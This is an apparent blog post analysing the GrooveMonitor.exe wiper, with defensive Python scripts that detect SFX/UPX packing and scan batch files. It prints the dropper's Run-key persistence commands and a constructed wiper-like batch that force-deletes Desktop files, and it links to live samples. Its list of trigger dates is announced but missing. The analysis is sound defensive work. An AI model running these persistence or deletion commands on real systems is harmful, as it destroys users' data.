Although it was first thought to be another serious state-level virus, further and deeper analysis shows that it is a relatively simple attack.
GrooveMonitor.exe is the main file.
Checking the file with a hex editor we notice something interesting: it is basically a self-extracting RAR file.
Opening the archive we see 3 more files: jucheck.exe, juboot.exe and SLEEP.EXE.
If we look at juboot.exe in a hex editor we find the following signature
The header belongs to "the Ultimate Packer for eXecutables" (http://upx.sourceforge.net).
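The two things spotted in the hex editor above (a RAR archive appended to a PE stub, and UPX markers) can be checked without running anything. The following is an added triage script written for this post, not code from the original analysis or from the malware; the sample byte strings are constructed stand-ins for real files, and the marker byte sequences are the standard RAR 4/5 archive signatures and the section names that stock UPX builds leave behind.

```python
# Static triage of a suspect PE: does it carry an appended RAR archive (SFX) or UPX markers?
MZ_MAGIC = b"MZ"
# RAR marker blocks (archive signatures). A RAR SFX is a PE stub with the archive appended,
# so the marker appears at a non-zero offset inside an MZ file.
RAR4_MARKER = b"Rar!\x1a\x07\x00"
RAR5_MARKER = b"Rar!\x1a\x07\x01\x00"
# Section names and the signature string left by stock UPX builds.
UPX_MARKERS = (b"UPX0", b"UPX1", b"UPX!")


def triage(data: bytes) -> dict:
    """Return which packaging markers a file carries. Pure byte matching, nothing is executed."""
    result = {"pe": data[:2] == MZ_MAGIC, "rar_sfx": False,
              "rar_offset": None, "rar_version": None, "upx": False}
    if not result["pe"]:
        return result
    for version, marker in ((5, RAR5_MARKER), (4, RAR4_MARKER)):
        off = data.find(marker)
        if off > 0:  # marker after the stub, i.e. an archive glued onto an executable
            result["rar_sfx"] = True
            result["rar_offset"] = off
            result["rar_version"] = version
            break
    result["upx"] = any(m in data for m in UPX_MARKERS)
    return result


def carve_payload(data: bytes):
    """Return the appended archive bytes (from the RAR marker onwards) or None.
    Hand the result to an unrar tool instead of double-clicking the SFX."""
    r = triage(data)
    return data[r["rar_offset"]:] if r["rar_sfx"] else None


def verdict(result: dict) -> list:
    """Human-readable next steps for the analyst, derived from triage()."""
    if not result["pe"]:
        return ["not a PE image (no MZ magic)"]
    notes = []
    if result["rar_sfx"]:
        notes.append(f"self-extracting RAR (v{result['rar_version']} marker at offset "
                     f"{result['rar_offset']}): extract with an unrar tool rather than running it")
    if result["upx"]:
        notes.append("UPX markers present: unpack with 'upx -d' before static analysis")
    return notes or ["no SFX or UPX markers found"]


def _pe_stub() -> bytes:
    # Constructed stand-in for a PE header plus DOS stub; real headers are much longer.
    return MZ_MAGIC + b"\x90" * 62 + b"This program cannot be run in DOS mode.\r\n$" + b"\x00" * 64


# Constructed samples (not real malware bytes): an SFX, a UPX-packed file, a plain PE, a bare archive.
SFX_SAMPLE = _pe_stub() + b"\x00" * 128 + RAR4_MARKER + b"\x73\x00\x00\x0d\x00\x00\x00" + b"\x00" * 32
UPX_SAMPLE = _pe_stub() + b"UPX0" + b"\x00" * 36 + b"UPX1" + b"\x00" * 36 + b"UPX!" + b"\x00" * 256
PLAIN_SAMPLE = _pe_stub() + b"\x00" * 256
BARE_RAR = RAR4_MARKER + b"\x00" * 64  # a plain archive, not a PE: marker at offset 0

if __name__ == "__main__":
    for name, blob in (("sfx", SFX_SAMPLE), ("upx", UPX_SAMPLE), ("plain", PLAIN_SAMPLE), ("rar", BARE_RAR)):
        print(name, verdict(triage(blob)))
```

Run it against a real file with `triage(open(path, "rb").read())`; the offset it reports is the one you would see in the hex editor, and `carve_payload` gives you the archive to unpack offline.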
I then opened the file with PE Explorer, which showed that the file is basically a batch file with the following content:
@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32\" "jucheck.exe"
It looks like juboot.exe runs sleep for 2 and then adds a registry Run key ensuring that 'jucheck.exe' is executed each time the computer starts up.
Checking jucheck.exe in the same manner, it is also a batch file.
The batch file is longer this time, so I'll summarize it for you. I made the source available on pastebin: http://pastebin.com/B2jKHUDH .
First it sleeps for 2, just like juboot.exe, then it deletes the juboot.exe file and the original GrooveMonitor.exe.
The code then checks for specific dates on which to run. The dates are:
The batch then moves on and attempts to erase the desktop in the same way.
Finally, the batch file runs "calc" (where did this come from?).
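Since both droppers are plain batch files, the behaviour described above (a delay, a Run-key write, deleting the dropper, a date gate, wiping a folder, launching something) can be pulled out mechanically before anyone runs the sample. The following scanner is an added example written for this post, not code from the original analysis. It embeds the juboot.exe batch body quoted earlier as one input, and a second, constructed script that only mirrors the summary of jucheck.exe given above (the real jucheck.exe source is on the pastebin link; the date here is a placeholder, not one of the real dates).

```python
import re

# The juboot.exe batch body quoted in the post, embedded here as sample input.
JUBOOT_BAT = r'''@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f
start "" /D"%systemroot%\system32\" "jucheck.exe"
'''

# Constructed lines mirroring the post's summary of jucheck.exe (delay, delete the dropper,
# date gate, wipe the desktop, run calc). NOT the real script; PLACEHOLDER_DATE is a placeholder.
JUCHECK_LIKE_BAT = r'''@echo off & setlocal
sleep for 2
del /f /q "%systemroot%\system32\juboot.exe"
del /f /q "%systemroot%\system32\GrooveMonitor.exe"
if "%date%"=="PLACEHOLDER_DATE" goto wipe
goto end
:wipe
del /f /s /q "%userprofile%\Desktop\*.*"
:end
start calc
'''

REG_ADD = re.compile(r"^\s*reg(?:\.exe)?\s+add\s+(?P<key>\S+)(?P<rest>.*)$", re.I)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.I)
VALUE_NAME = re.compile(r"/v\s+(?P<name>\S+)", re.I)
VALUE_DATA = re.compile(r'/d\s+(?:"(?P<quoted>[^"]*)"|(?P<bare>\S+))', re.I)
DEL_CMD = re.compile(r"^\s*(?:del|erase)\s+(?P<args>.+)$", re.I)
DELAY_CMD = re.compile(r"^\s*(?:sleep|timeout|ping\s+-n)\b", re.I)  # sleep here is SLEEP.EXE from the SFX
START_CMD = re.compile(r"^\s*start\b", re.I)
DATE_REF = re.compile(r"%date%", re.I)


def _commands(line: str):
    """Split a batch line on '&' / '&&' so compound lines yield each command.
    Good enough for triage; it does not honour '&' inside quotes."""
    return [c.strip() for c in re.split(r"\s*&&?\s*", line) if c.strip()]


def scan_batch(text: str) -> list:
    """Return a list of {line, type, detail} indicators found in a batch script."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for cmd in _commands(line.lstrip("@")):
            m = REG_ADD.match(cmd)
            if m:
                key, rest = m.group("key"), m.group("rest")
                name, data = VALUE_NAME.search(rest), VALUE_DATA.search(rest)
                findings.append({"line": lineno,
                                 "type": "persistence" if RUN_KEY.search(key) else "registry_write",
                                 "detail": {"key": key,
                                            "name": name.group("name") if name else None,
                                            "data": (data.group("quoted") or data.group("bare")) if data else None}})
                continue
            m = DEL_CMD.match(cmd)
            if m:
                findings.append({"line": lineno, "type": "file_deletion", "detail": {"args": m.group("args")}})
                continue
            if DELAY_CMD.match(cmd):
                findings.append({"line": lineno, "type": "delay", "detail": {"cmd": cmd}})
                continue
            if START_CMD.match(cmd):
                findings.append({"line": lineno, "type": "launch", "detail": {"cmd": cmd}})
            if DATE_REF.search(cmd):
                findings.append({"line": lineno, "type": "date_gate", "detail": {"cmd": cmd}})
    return findings


def indicator_types(text: str) -> set:
    return {f["type"] for f in scan_batch(text)}


def persistence_entries(text: str) -> list:
    """(value name, data) pairs written to a Run key: what to look for on a suspect host."""
    return [(f["detail"]["name"], f["detail"]["data"])
            for f in scan_batch(text) if f["type"] == "persistence"]


if __name__ == "__main__":
    for label, script in (("juboot", JUBOOT_BAT), ("jucheck-like", JUCHECK_LIKE_BAT)):
        print(label, sorted(indicator_types(script)), persistence_entries(script))
```

The `persistence_entries` output is the practical part: a value named jucheck.exe under HKCU\...\CurrentVersion\Run pointing into system32 is exactly what to search for on other machines, and the Run key is also the simplest place to break the chain, since removing that value stops jucheck.exe from being started on the next boot.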
I haven't finished messing with the samples, but as you've seen it's not a sophisticated attack and will be easy to detect and stop before any damage is done.
If you want to look at the samples for yourselves, I've made them available at http://turbobit.net/aywxvv08e83b.html